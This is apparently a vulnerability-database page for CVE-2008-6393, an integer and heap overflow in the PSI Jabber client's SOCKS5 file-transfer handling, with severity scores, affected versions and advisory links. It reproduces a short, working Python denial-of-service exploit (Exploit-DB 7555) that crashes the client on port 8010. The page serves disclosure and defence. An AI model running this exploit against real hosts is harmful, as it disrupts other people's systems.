CVE-2008-6393 : Detail

CVE-2008-6393

26.54%V4
Network
2009-03-03
15h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PSI Jabber client before 0.12.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a file transfer request with a negative value in a SOCKS5 option, which bypasses a signed integer check and triggers an integer overflow and a heap-based buffer overflow.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 7555

Publication date : 2008-12-22 23h00 +00:00
Author : Sha0
EDB Verified : Yes

#!/usr/bin/python #psi jabber client 8010/tcp remote denial of service (win & lin) #by sha0[at]badchecksum.net #http://jolmos.blogspot.com import socket, sys sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: sock.connect((sys.argv[1],8010)) except: print 'Cannot connect!' sys.exit(1) try: sock.send('\x05\xff') print 'Crashed!' except: print 'Cannot send!' sock.close() # milw0rm.com [2008-12-23]

Products Mentioned

Configuraton 0

Psi-im>>Psi >> Version To (including) 0.12

    Psi-im>>Psi >> Version 0.1.0

      Psi-im>>Psi >> Version 0.8.6

        Psi-im>>Psi >> Version 0.8.7

          Psi-im>>Psi >> Version 0.9

            Psi-im>>Psi >> Version 0.9.1

              Psi-im>>Psi >> Version 0.9.2

                Psi-im>>Psi >> Version 0.9.3

                  Psi-im>>Psi >> Version 0.11

                    Jabber>>Jabber_client >> Version *

                      References

                      http://secunia.com/advisories/34259
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://secunia.com/advisories/34301
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      https://www.exploit-db.com/exploits/7555
                      Tags : exploit, x_refsource_EXPLOIT-DB
                      http://www.securityfocus.com/archive/1/499563
                      Tags : mailing-list, x_refsource_BUGTRAQ
                      http://www.openwall.com/lists/oss-security/2009/02/25/5
                      Tags : mailing-list, x_refsource_MLIST
                      http://secunia.com/advisories/33311
                      Tags : third-party-advisory, x_refsource_SECUNIA
                      http://www.debian.org/security/2009/dsa-1741
                      Tags : vendor-advisory, x_refsource_DEBIAN
                      http://secunia.com/advisories/34119
                      Tags : third-party-advisory, x_refsource_SECUNIA